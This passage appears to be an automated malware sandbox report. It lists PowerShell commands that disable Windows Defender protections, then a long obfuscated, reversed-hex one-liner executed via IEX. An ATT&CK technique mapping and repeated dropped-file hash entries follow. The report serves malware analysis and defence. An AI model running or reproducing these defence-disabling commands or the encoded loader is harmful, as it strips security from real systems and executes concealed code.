C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
1⤵
- Process spawned unexpected child process
PID:2628

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableScriptScanning $true
1⤵
- Process spawned unexpected child process
PID:2692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SubmitSamplesConsent 2
1⤵
- Process spawned unexpected child process
PID:2760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -MAPSReporting 0
1⤵
- Process spawned unexpected child process
PID:2916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -HighThreatDefaultAction 6 -Force
1⤵
- Process spawned unexpected child process
PID:2064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -ModerateThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
PID:1152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -LowThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
PID:2296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -SevereThreatDefaultAction 6
1⤵
- Process spawned unexpected child process
PID:2384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c $ijijinjnini='**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**56**$**07**$**97**$**45**$**07**$**57**$**47**$**27**$**16**$**47**$**35**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**47**$**56**$**35**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**37**$**c6**$**16**$**66**$**42**$**a3**$**d6**$**27**$**96**$**66**$**e6**$**f6**$**34**$**d2**$**02**$**46**$**e6**$**56**$**66**$**56**$**44**$**e6**$**96**$**75**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**35**$**d2**$**07**$**f6**$**47**$**35**$**a0**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**f6**$**47**$**02**$**47**$**96**$**02**$**47**$**56**$**37**$**02**$**46**$**e6**$**16**$**02**$**56**$**36**$**96**$**67**$**27**$**56**$**37**$**02**$**56**$**86**$**47**$**02**$**07**$**f6**$**47**$**37**$**02**$**32**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**46**$**27**$**f6**$**75**$**44**$**02**$**56**$**07**$**97**$**45**$**d2**$**02**$**13**$**02**$**56**$**57**$**c6**$**16**$**65**$**d2**$**02**$**22**$**56**$**27**$**16**$**77**$**97**$**07**$**35**$**96**$**47**$**e6**$**14**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**22**$**02**$**56**$**d6**$**16**$**e4**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**97**$**47**$**27**$**56**$**07**$**f6**$**27**$**05**$**d6**$**56**$**47**$**94**$**d2**$**47**$**56**$**35**$**a0**$**d7**$**a0**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**d6**$**56**$**47**$**94**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**02**$**d6**$**56**$**47**$**94**$**d2**$**77**$**56**$**e4**$**02**$**02**$**02**$**02**$**a0**$**b7**$**02**$**92**$**92**$**27**$**56**$**e6**$**96**$**16**$**47**$**e6**$**f6**$**34**$**02**$**56**$**07**$**97**$**45**$**86**$**47**$**16**$**05**$**d2**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**02**$**86**$**47**$**16**$**05**$**d2**$**47**$**37**$**56**$**45**$**82**$**12**$**82**$**02**$**66**$**96**$**a0**$**22**$**27**$**56**$**46**$**e6**$**56**$**66**$**56**$**44**$**02**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**56**$**96**$**36**$**96**$**c6**$**f6**$**05**$**c5**$**54**$**25**$**14**$**75**$**45**$**64**$**f4**$**35**$**c5**$**a3**$**d4**$**c4**$**b4**$**84**$**22**$**02**$**d3**$**02**$**86**$**47**$**16**$**07**$**76**$**56**$**27**$**42**$**a0**$**a0**$**46**$**e6**$**56**$**35**$**27**$**56**$**67**$**56**$**e4**$**02**$**47**$**e6**$**56**$**37**$**e6**$**f6**$**34**$**37**$**56**$**c6**$**07**$**d6**$**16**$**35**$**47**$**96**$**d6**$**26**$**57**$**35**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**76**$**e6**$**96**$**47**$**27**$**f6**$**07**$**56**$**25**$**35**$**05**$**14**$**d4**$**d2**$**02**$**56**$**36**$**27**$**f6**$**64**$**d2**$**02**$**56**$**46**$**f6**$**d4**$**47**$**96**$**46**$**57**$**14**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**b6**$**27**$**f6**$**77**$**47**$**56**$**e4**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**46**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**02**$**37**$**37**$**56**$**36**$**36**$**14**$**27**$**56**$**46**$**c6**$**f6**$**64**$**46**$**56**$**c6**$**c6**$**f6**$**27**$**47**$**e6**$**f6**$**34**$**56**$**c6**$**26**$**16**$**e6**$**54**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**e6**$**e6**$**16**$**36**$**35**$**47**$**07**$**96**$**27**$**36**$**35**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**76**$**e6**$**96**$**27**$**f6**$**47**$**96**$**e6**$**f6**$**d4**$**56**$**d6**$**96**$**47**$**c6**$**16**$**56**$**25**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**e6**$**f6**$**96**$**47**$**36**$**56**$**47**$**f6**$**27**$**05**$**65**$**14**$**f4**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**57**$**27**$**47**$**42**$**02**$**d6**$**56**$**47**$**37**$**97**$**35**$**e6**$**f6**$**96**$**47**$**e6**$**56**$**67**$**56**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**27**$**47**$**e6**$**94**$**56**$**c6**$**26**$**16**$**37**$**96**$**44**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**47**$**56**$**35**$**a0**$**a0**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**e2**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**e2**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**47**$**56**$**74**$**02**$**d3**$**02**$**37**$**66**$**56**$**27**$**07**$**42**$**a0**$**a0**$**22**$**a3**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**27**$**57**$**f6**$**95**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**a0**$**22**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**a0**$**a0**$**d7**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**02**$**02**$**02**$**02**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**22**$**02**$**a3**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**37**$**37**$**56**$**36**$**f6**$**27**$**05**$**02**$**76**$**e6**$**96**$**46**$**46**$**14**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**02**$**02**$**02**$**02**$**a0**$**b7**$**a0**$**92**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**02**$**e6**$**96**$**02**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**82**$**02**$**86**$**36**$**16**$**56**$**27**$**f6**$**66**$**a0**$**a0**$**d7**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**02**$**02**$**02**$**02**$**a0**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**02**$**22**$**02**$**a3**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**02**$**86**$**47**$**16**$**05**$**02**$**76**$**e6**$**96**$**46**$**46**$**14**$**22**$**02**$**47**$**37**$**f6**$**84**$**d2**$**56**$**47**$**96**$**27**$**75**$**02**$**02**$**02**$**02**$**a0**$**b7**$**a0**$**02**$**92**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**02**$**e6**$**96**$**02**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**56**$**42**$**82**$**02**$**86**$**36**$**16**$**56**$**27**$**f6**$**66**$**a0**$**a0**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**02**$**86**$**47**$**16**$**05**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**d2**$**02**$**56**$**36**$**e6**$**56**$**27**$**56**$**66**$**56**$**27**$**05**$**07**$**d4**$**d2**$**46**$**46**$**14**$**a0**$**a0**$**a0**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**07**$**96**$**27**$**36**$**37**$**77**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**d6**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**37**$**f6**$**86**$**e6**$**f6**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**16**$**47**$**86**$**37**$**d6**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**c6**$**56**$**86**$**37**$**27**$**56**$**77**$**f6**$**07**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**c6**$**16**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**37**$**a6**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**96**$**47**$**55**$**c6**$**c6**$**16**$**47**$**37**$**e6**$**94**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**d6**$**37**$**16**$**c6**$**96**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**37**$**56**$**27**$**47**$**67**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**37**$**36**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**f6**$**05**$**37**$**16**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**37**$**27**$**56**$**37**$**77**$**f6**$**27**$**26**$**76**$**56**$**27**$**f5**$**47**$**56**$**e6**$**07**$**37**$**16**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**27**$**56**$**c6**$**96**$**07**$**d6**$**f6**$**36**$**f5**$**47**$**56**$**e6**$**07**$**37**$**16**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**c6**$**96**$**57**$**26**$**37**$**d4**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**27**$**56**$**27**$**f6**$**c6**$**07**$**87**$**54**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**c6**$**96**$**57**$**26**$**37**$**d4**$**c5**$**93**$**13**$**33**$**03**$**33**$**e2**$**03**$**e2**$**43**$**67**$**c5**$**b6**$**27**$**f6**$**77**$**56**$**d6**$**16**$**27**$**64**$**c5**$**45**$**54**$**e4**$**e2**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**c6**$**96**$**57**$**26**$**37**$**d4**$**c5**$**73**$**23**$**73**$**03**$**53**$**e2**$**03**$**e2**$**23**$**67**$**c5**$**b6**$**27**$**f6**$**77**$**56**$**d6**$**16**$**27**$**64**$**c5**$**45**$**54**$**e4**$**e2**$**47**$**66**$**f6**$**37**$**f6**$**27**$**36**$**96**$**d4**$**c5**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**27**$**56**$**27**$**f6**$**c6**$**07**$**87**$**54**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**07**$**96**$**27**$**36**$**37**$**77**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**46**$**d6**$**36**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**47**$**37**$**f6**$**86**$**e6**$**f6**$**36**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**16**$**47**$**86**$**37**$**d6**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**c6**$**c6**$**56**$**86**$**37**$**27**$**56**$**77**$**f6**$**07**$**c5**$**03**$**e2**$**13**$**67**$**c5**$**c6**$**c6**$**56**$**86**$**35**$**27**$**56**$**77**$**f6**$**05**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**35**$**c5**$**37**$**77**$**f6**$**46**$**e6**$**96**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**56**$**87**$**56**$**e2**$**36**$**c6**$**16**$**34**$**c5**$**23**$**33**$**d6**$**56**$**47**$**37**$**97**$**37**$**c5**$**35**$**75**$**f4**$**44**$**e4**$**94**$**75**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**c5**$**a3**$**54**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**c5**$**a3**$**44**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**c6**$**c6**$**57**$**e6**$**42**$**02**$**e3**$**02**$**92**$**72**$**c5**$**a3**$**34**$**72**$**82**$**46**$**46**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**a0**$**47**$**37**$**96**$**c4**$**97**$**16**$**27**$**27**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**47**$**36**$**56**$**c6**$**c6**$**f6**$**34**$**e2**$**d6**$**56**$**47**$**37**$**97**$**35**$**02**$**47**$**36**$**56**$**a6**$**26**$**f4**$**d2**$**77**$**56**$**e4**$**02**$**d3**$**02**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**37**$**37**$**56**$**36**$**f6**$**27**$**07**$**42**$**a0**$**47**$**37**$**96**$**c4**$**97**$**16**$**27**$**27**$**14**$**e2**$**37**$**e6**$**f6**$**96**$**47**$**36**$**56**$**c6**$**c6**$**f6**$**34**$**e2**$**d6**$**56**$**47**$**37**$**97**$**35**$**02**$**47**$**36**$**56**$**a6**$**26**$**f4**$**d2**$**77**$**56**$**e4**$**02**$**d3**$**02**$**37**$**e6**$**f6**$**96**$**37**$**57**$**c6**$**36**$**87**$**54**$**86**$**47**$**16**$**07**$**42**$**a0**$**54**$**c4**$**94**$**64**$**f4**$**25**$**05**$**25**$**54**$**35**$**55**$**a3**$**67**$**e6**$**56**$**42**$**02**$**d3**$**02**$**86**$**47**$**16**$**05**$**27**$**56**$**37**$**57**$**42';$asciiChars =$ijijinjnini.ToCharArray();[Array]::Reverse($asciiChars);$tu=-join $asciiChars;$jm=$tu.Split('**$**') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X;
1⤵
- Process spawned unexpected child process
PID:2620

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
bef6a8b51ef6cfdeaf211f9c4cb30c1f

SHA1
3068e904fbb1c05ef22751e7c3853abd4f2f22ea

SHA256
4b0f2d86d5ba3762d64718a4bcc6f5a1fc43a88b31678e059aa30e82ffc28066

SHA512
3e182f1793458d5cb4f901ac5a6fafdb3b01b966bd9ad4b03cef89e65d6dbca7838888db1cad1a31f6b27198889029049916501dd6c3f5edd22d33c7b4abff3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
75a4d9a1322db533a88dc8a351865a8a

SHA1
8e13f2de0e7fa9d8684735ba6a1901ee55e9ccfc

SHA256
365488a621f2ff6dac3669136867a97a100d58de0524137e1d29d7feb8b12a36

SHA512
634a4b287c2826b88a863f246a1ca44107e2bdb0b83cd35cd38506d1ed5d8c675eafeefd670b6f23c1eac24f73fe89a44540ef2a3ade3297bc4e638065e3e14e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
a089221a2fdec4db86944792d9536b662327165d9cbcf52015814c4a009775da014c127b873a962cbfd169c1f64e51d3a2cf9291174d3b478fa4b2308004aefd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
d3f7387fc501a91d96ceec60369df032

SHA1
bdcca9fe0e42dbd62a1597aa6d42b67ce88ae545

SHA256
7df0cd988748aec207f0c7c6360b91984e6e33cc2a3bb431d0416227866df4c4

SHA512
